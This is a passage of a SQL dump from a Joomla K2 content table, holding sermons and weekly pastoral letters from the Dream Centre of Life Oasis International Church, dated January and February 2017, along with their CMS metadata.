'{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(17, 'Becoming An Effective Christian in these Last Days', 'becoming-an-effective-christian-in-these-last-days', 2, 1, '<p>Luke 13:6-9, John 15:8, 16, Matthew 25:14-30</p>\r\n<p>You will be amazed that God frowns at an unfruitful child. He is not coming to judge only the sinners, the Lord is coming also for the unfruitful Christians, He calls them wicked servants (Luke 19:20-24). Even Jesus had to curse a fig tree that had only leaves but without any fruits to show for it. A Christian should not only be full of activities but be full of results.</p>\r\n', '\r\n<p>The day that God is coming for you it’s the results that He will come for. The body of Christ today is filled with people that are occupied by activities, everyone knows that they are doing something but they have nothing to show for it.</p>\r\n<p>The fruit of righteousness is holiness, the fruit of evangelism is salvation of souls, the fruit of intercession is divine intervention and interruption, the fruit of knowledge is understanding, the fruit of follow-up is membership, the fruit of your church membership is a destiny formation in you. Separate activities from results, stop wasting your time with activities, go for results. The Father rejoices when His children produce fruit, He takes special care to prune, to cleanse, those who bring fruit so that they bring more! He does not want to just have vine branches; He wants to have fruitful branches, branches that give fruit to their full potential. John 15:1-2</p>\r\n<p>Activities are what men see but result is what God judges. In 2 Samuel 5:1-3, the elders of Israel came to David and said, when Saul was king over them, he was the one that led them out and in. Saul was the leader on the throne but as far as what God was doing was concerned, David was the recognized leader. God was preparing David to be a replacement for Saul, because he had no contribution to God\'s purpose. It\'s not enough that you\'re leading a committee, or that there is an assignment you are coordinating, you must be sure that you are winning the pleasure of God there. If you will not be a replaceable material you must be committed to producing results.</p>\r\n<p>How to be a Christian with Results:</p>\r\n<p>1.      Prayers. Luke 5:16-24, Mark 1:35-42,</p>\r\n<p>-          A major miracle always follows whenever Jesus withdrew Himself to pray.</p>\r\n<p>-          It took prayers of the Apostles in Acts 4:31-37 to bring about the kind of love that bring about the harvest of multitude of believers. For any labour to yield fruits it must be done in love. Avoid the works of the flesh. Gal 5: 19-21.</p>\r\n<p>2.      Faithfulness NOT facefulness. Matthew 24:45-47, Luke 16:10-12</p>\r\n<p>-          God rewards faithfulness not eye service.</p>\r\n<p>-          Facefulness can give you a title but you will need faithfulness to carry the life and the anointing for assignments.</p>\r\n<p>-          Eliab had the outlook but David had the life and the training. Go for the life!</p>\r\n<p>3.      Wisdom: Proverbs 24:3, Eccl 10:10</p>\r\n<p>-          When God gives we gather, and it takes wisdom to gather.</p>\r\n<p>-          There is wisdom to approach an assignments, every assignment has its strategy.</p>\r\n<p>4.      Intimacy with the father. John 15:4-5</p>\r\n<p>-          This will birth accuracy</p>\r\n<p>-          Knowing the right activity, the right method, and the right timing. David will always enquire of the Lord whenever their is battle.</p>\r\n<p>5.      Be a Solomon and not an Absalom in your father’s house.</p>\r\n<p>-          2 Samuel 15:1-6, 2 Samuel 18:18-Absalom stole the heart of all Israelites. He chased his father from the throne, wanting his own. Its a strange son that builds a monument for himself in his father\'s house. Solomon built the temple according to the pattern that his father received, and the glory of the Lord came unto the temple.1 Chr 28:19, 1 Kings 6:38, 1 Kings 8:10-11.</p>\r\n<p>-          Genesis 26:18-Isaac did not dig new wells, He dug the wells that his father had dug before and called them the same names that his father called them. And you could see that all the wells brought forth water.</p>\r\n<p>6.      Do assignments according to the capacity of your grace, ability and potentials. Matthew 25:14-30</p>\r\n<p>-          Saul’s armour will not work for David, it is your grace and special ability that makes you distinct.</p>\r\n<p>-          Don’t compete in the place of assignments.</p>\r\n<p>-          Don’t compare yourself with another.</p>\r\n<p>-          Don’t use another person’s style, be yourself.</p>\r\n<p>The harvest is plentiful, but labourers are few. God is looking for reapers, can God depend on you as a reaper in this end time? Will you be able to bring forth the fruit that will last? May you not disappoint the heavenly trust in your day(Amen).</p>', NULL, NULL, '[]', '', '2017-01-22 08:57:08', 196, '', 0, '0000-00-00 00:00:00', '2017-01-29 10:23:56', 196, '2017-01-22 08:57:08', '0000-00-00 00:00:00', 0, 1, 8, 1, 0, '', '', '', '', 3924, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*');
INSERT INTO `y57u5_k2_items` (`id`, `title`, `alias`, `catid`, `published`, `introtext`, `fulltext`, `video`, `gallery`, `extra_fields`, `extra_fields_search`, `created`, `created_by`, `created_by_alias`, `checked_out`, `checked_out_time`, `modified`, `modified_by`, `publish_up`, `publish_down`, `trash`, `access`, `ordering`, `featured`, `featured_ordering`, `image_caption`, `image_credits`, `video_caption`, `video_credits`, `hits`, `params`, `metadesc`, `metadata`, `metakey`, `plugins`, `language`) VALUES
(18, 'From our Father\'s Heart  (22/01/2017)', 'from-our-father-s-heart', 5, 1, '<p>Dearly Beloved of God,</p>\r\n<p>2017 God wants you to get it right in your walk with Him. Once you are able to get it right, it becomes easier for God to work with you. Let me show you some keys to getting it right so that you will be able to progress to the next stage which is getting better.</p>\r\n', '\r\n<p>1. Discipline: You must discipline your mouth to say what God is saying. God will only work with His words. Jeremiah 1 verse 12 says “ Then said the Lord unto me, Thou hast well seen: for I will hasten my word to perform it.”</p>\r\n<p>2. Watch your mouth: Learn to control and protect your mouth. Your mouth must be WORD-CONTROLLED. This is not a joke, this is my 34th year of obeying God\'s call. People are looking around and trying to find explanations about what is making things happen in Dream Centre. Some of you are hanging out in church without understanding the truths that make things happen. God is not watching your complaints, He is watching for His words. Some pastors think that there is something else that is making things work at the Dream Centre. There is nothing else apart FROM THE WORD OF GOD.  Anything outside the Bible, the devil is there.</p>\r\n<p>3. Search the Bible for what God has said</p>\r\n<p>4. Begin to meditate upon them, memorize them, and store them in your heart until you know them by heart</p>\r\n<p>5. Listen well in church for what God has said i.e. Prophecies. That is what God will do. Meditate on it, store it in your heart and memorize it.</p>\r\n<p>6. Don’t speak in the heat of negative passion. Discipline your mouth to speak only what God has said. Be consistent until you see result. Result will come little by little and it will begin to accelerate. Be bold to declare what God has said.</p>\r\n<p>7. Maintain Fellowship with the Holy Spirit and fellow believers. Separate from people that will attack what is in your heart.</p>\r\n<p>Take these points and start a program now when it is not too late and when there is no pressure. Don\'t wait until there is a sickness before you find out what God has said concerning your health. </p>\r\n<p>Build up your word bank now!</p>\r\n<p>Till next week go and win with Jesus.</p>\r\n<p>God’s Servant</p>\r\n<p>Rev Olusola Areogun.</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-01-22 10:19:20', 196, '', 0, '0000-00-00 00:00:00', '2017-01-29 14:03:32', 196, '2017-01-22 10:19:20', '0000-00-00 00:00:00', 0, 1, 5, 0, 0, '', '', '', '', 2529, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(19, 'How to Be a Correct Christian in a World of Pollution and Mixtures (Part 1) - Romans 12:1-2', 'correct-christian', 2, 1, '<p>God and the devil have been engaged in an all-out war for the souls of men for a very long time. And as Christians, we are to be God\'s representatives on the earth in this war. We are His soldiers. We have been empowered with many a tool to bring forth destruction upon the kingdom of darkness. Sadly, however, in these modern times, we Christians have become increasingly confused individuals.</p>\r\n', '\r\n<p>There no longer exists a clear demarcation between most Christians and the rest of the world. People are losing ground to the enemy and they are losing it fast. This problem I believe comes out of an identity crisis. </p>\r\n<p><strong>The Problems That Plague Today’s Christian and How To Solve Them. 1 Corinthians 10:11-13.</strong></p>\r\n<p>You are not the first person to pass through what you are going through right now and you must not fail God in your generation. When you understand the wiles of the enemy, he will not be able to deceive you anymore. Here are some of the major problems facing today\'s Christianity:</p>\r\n<ol>\r\n<li>There is widespread ignorance in the church about destiny, purpose, proper behavior, dressing, etc. It has reached the point now that a lot of Christians come to church already doubting the Bible without knowing.</li>\r\n<li>Most Christians are shallow in their word level, faith and spiritual walk with God. Majority of Christians today, can\'t boast of a steady quiet time, they barely know what the Bible has to say about their situation, future and their rights.</li>\r\n<li>Contamination of the sheepfold and pulpit alike. Giving birth to Christians who are too worldly to be called Christians and too churchy to be called unbelievers.  I know thy works, that thou art neither cold nor hot: I would thou wert cold or hot. Revelation 3:15-16</li>\r\n<li>Lukewarm Christianity. It\'s doctrines like this that produce Christians who can spend more time watching a soccer game than they would in church on Sunday. The direct danger of this is that it puts you at loggerheads with God.</li>\r\n<li>Most Christians have become too fixated on, obsessed with and driven by the things of the world such as career, money, fame and status that they ignore the real reason why they are alive in the first place: which is to serve God.  </li>\r\n</ol>\r\n<p><strong>Duties and Expectations of Christians Acts 9:6 Matthew 28:19-20 and Mark 16:15-18</strong> </p>\r\n<p>As Christians we have many spiritual responsibilities. Your first duty as a Christian is as a Messenger of the good news to the nations. This is your core assignment. In my church, The Dream Centre of the Life Oasis International Church, one of our philosophies is that \"Every member, a minister.\" The basic and general commission all Christians share on earth is to spread the gospel to all the nations. But it doesn\'t stop there. In Matthew\'s account, Jesus said we should baptize them in His name and teach them to observe all the commandments He has given us. God requires that every Christian must be competent and strong enough in their faith to be able to carry out the following: </p>\r\n<ol>\r\n<li><strong>You must be able to teach the nations</strong>. This means you should have learnt enough from your Pastor, your Bible study and the Holy Spirit, to effectively teach the gospel to people anywhere you find yourself to a point where they can comfortable teach others also.</li>\r\n<li><strong>You must have a strong understanding of the concepts and precepts of baptism.</strong> These Baptisms include baptism into Christ (the new birth), Holy Ghost baptism and water baptism.</li>\r\n<li><strong>You must have a firm grasp of the commandments given to us in the old and new testament.</strong> This is important because it equips you to be able to guide and disciple new Christians to a place of understanding, for them to be able to follow those commandments properly.</li>\r\n</ol>\r\n<p>Let\'s have a look at the remaining requirements that are added in Mark\'s account:</p>\r\n<ol>\r\n<li><strong>You must be able to cast out devils</strong>. 2 Corinthians 3:17. This point is one area I\'m hundred percent sure the majority of Christians and churches either don\'t believe in or push on the pastors alone. A Christian that doesn\'t know how to cast out devils from people or places, is like a soldier that doesn\'t know how to operate his weaponry and kill the enemy. You must become a threat to the devil, such that when you move into a new area, start a new job or meet a demon possessed person, the devil can be sure that you will cast him out and put a stop to his operations without negotiation.</li>\r\n<li><strong>You Must Be Able To Speak In Tongues And Have A Clear Understanding Of The Advantage It Gives You</strong>. Romans 8:26-27. Speaking in tongues is a very powerful tool for the Christian because it gives the Holy Spirit room to pray through you. Knowing how to speak in tongues is one thing, understanding clearly, why you do so is another matter entirely.. However, the efficiency of this is directly determined by how well you understand what\'s happening. In, the bible shows us what happens when we speak in tongues.</li>\r\n<li><span style=\"font-size: 12.16px;\"><strong>You must be able to operate at a level of faith and confidence that allows god to work through you to do his great work.</strong> In Mark chapter 16 verse 18, the Bible says, referring to us, that we shall take up serpents; and if we drink any deadly thing, it shall not hurt us; we shall lay hands on the sick, and we shall recover. These are all miracles but they don\'t just happen automatically. If you don\'t believe me, just walk up to the nearest hospital and declare without faith that you\'re there to heal the sick, your failure is certain. In order to walk in the realm of the miraculous shown here, you must develop your faith in God and your confidence in His ability. </span></li>\r\n</ol>', NULL, NULL, '[]', '', '2017-01-29 10:24:14', 196, '', 0, '0000-00-00 00:00:00', '2017-01-29 12:32:20', 196, '2017-01-29 10:24:14', '0000-00-00 00:00:00', 0, 1, 9, 0, 0, '', '', '', '', 4378, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(20, 'From our Father\'s Heart (29/01/2017)', 'fathers-heart-29-01-2017', 5, 1, '<p>Dearly beloved,</p>\r\n<p>You must operate in the glory by prophecy this year. This is a house of prophecies and there are a lot added unto us in the ongoing 84 days fasting and prayers. You must wrap your life with them and let them decide your experiences in 2017.</p>\r\n', '\r\n<p>Not everybody sees the glory cloud, not everybody moves with the glory, but I pray that you will see it, you will move with it and you will perceive it. When Israel left Egypt, the glory cloud moved upward and forward―those are their only two directions. They didn’t move when the glory cloud didn’t move; when the glory cloud moved, they also moved and they never lacked. The Bible says, when the sea saw the glory it fled: Jordan was driven back.  The mountains skipped like rams, and the little hills like lambs.  May you move with the glory cloud in 2017. There are new things we achieve and accomplish as we move with the glory cloud.</p>\r\n<p>There is an anointing for breaking new grounds, shattering new grounds, what you have not done before in your life, what has not been done before in your ancestry. You are breaking new barriers in 2017 in Jesus name, others may go down but we are going higher, new heights in 2017, new heights for us, new rooms, new realms, new things, new grounds.</p>\r\n<p>Nehemiah took 52 weeks to complete his job. Your confession this year over your project must be, “Thou saith the Lord, my hands have laid the foundation of this building; my hands will finish it. I shall long enjoy the works of my labour.” May you be complete in 2017. Take note of what the Lord has said, and always refer to them in your notebooks. Keep speaking them, keep declaring them. When you are prophesying, it is not the time to pray in tongues. Just let the life of God proceed out of your mouth in the name of Jesus.</p>\r\n<p>Take all the prophetic declarations God has given to us and re-introduce them into your life with your own mouth. Let your confession be, “be it unto me according to this word in 2017”. Enlarge your faith as you prophesy; you are tapping into the power of prophecy as you speak those words; let it not stop let it continue. You can rearrange your life today with the power of prophesying despite all mistakes or the attacks of the enemy.</p>\r\n<p>It was said of Saul that, “Is Saul also among the prophet?” He was just a partaker of that spirit. Don’t let yours be just a visitation; let it be a lifestyle, an ongoing experience with you. And soon, your prophecy will happen!</p>\r\n<p>Till next week, go and win with Jesus.</p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-01-29 14:04:13', 199, '', 0, '0000-00-00 00:00:00', '2017-02-12 07:37:00', 196, '2017-01-29 14:04:13', '0000-00-00 00:00:00', 0, 1, 6, 0, 1, '', '', '', '', 38006, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(21, 'From our Father\'s Heart (05/02/2017)', 'from-our-father-s-heart-05-02-2017', 5, 1, '<p>Dearly beloved,</p>\r\n<p>You must know how to sustain the presence of the Lord in your life. You may not know many things but if you keep the presence of God He will get you through. That was the secret of David. It was not David that killed Goliath, it was the presence of God that killed Goliath. How can a stone thrown by a boy kill a giant like that? David himself said the Lord that delivered me from the hand of the bear will deliver you into my hand.</p>\r\n', '\r\n<p> It was not Daniel, Shadrach and Abednego that kept themselves from the lion or the fire, it was the presence of God with them. And that’s the presence that you must sustain whether you are a banker or you are a housewife or a business man in 2017. It is His presence that is our commonwealth. When He is there you cannot suffer long, when He’s there you cannot be poor for long, when He’s there you cannot be sick for long. That’s why the devil wants us to trade the presence of God away. Your marriage will be a place where God’s presence is real. </p>\r\n<p>Don’t measure yourself as a very strong man because you have money, and don’t boast because you know many people. Key to success in the journey of life is who is going with you and not how well you are walking. </p>\r\n<p>There are so many things required from you if you will sustain the presence of the Lord, and I have taken time to explain them deeply in one of the books coming soon titled, THE PRESENCE OF GOD. Listed below are few of them:</p>\r\n<ul>\r\n<li> Be born again:  </li>\r\n<li> Stay away from sin: </li>\r\n<li> Don’t ever do anything that there is a struggle in your spirit over</li>\r\n<li> Don’t get involved in things that grieve the holy spirit</li>\r\n<li> Take heed to how you handle assignment</li>\r\n<li> Don’t do privately or publicly what god will not be able to participate with you in</li>\r\n<li> Wrong relationships in your life</li>\r\n<li> Watch what comes out of your mouth</li>\r\n<li> Be a worshipper</li>\r\n<li> Respect the things that has to do with the callings of god in your life </li>\r\n<li> Remain broken hearted and tremble at his words</li>\r\n<li> Let your obedience be thorough and complete</li>\r\n<li> Don’t ever become ashamed of anything that draw the presence of god into your life</li>\r\n<li> Define the assignment that god has connected to developing you for your destiny and take it serious. </li>\r\n</ul>\r\n<p>Don’t get out of your house in the morning without having a discussion with Him, without putting your case in His hands. The Bible says, He that dwelleth in the secret place of the most High shall abide under the shadow of the Almighty. His presence is your strength. Everything can fail around but His presence creates a shield for you. </p>\r\n<p>Till next week, go and …..</p>\r\n<p>God’s servant,</p>\r\n<p>Rev Olusola Areogun</p>\r\n<p> </p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-02-05 21:30:00', 196, '', 0, '0000-00-00 00:00:00', '2017-02-05 21:39:28', 196, '2017-02-05 21:30:00', '0000-00-00 00:00:00', 0, 1, 7, 0, 0, '', '', '', '', 1912, 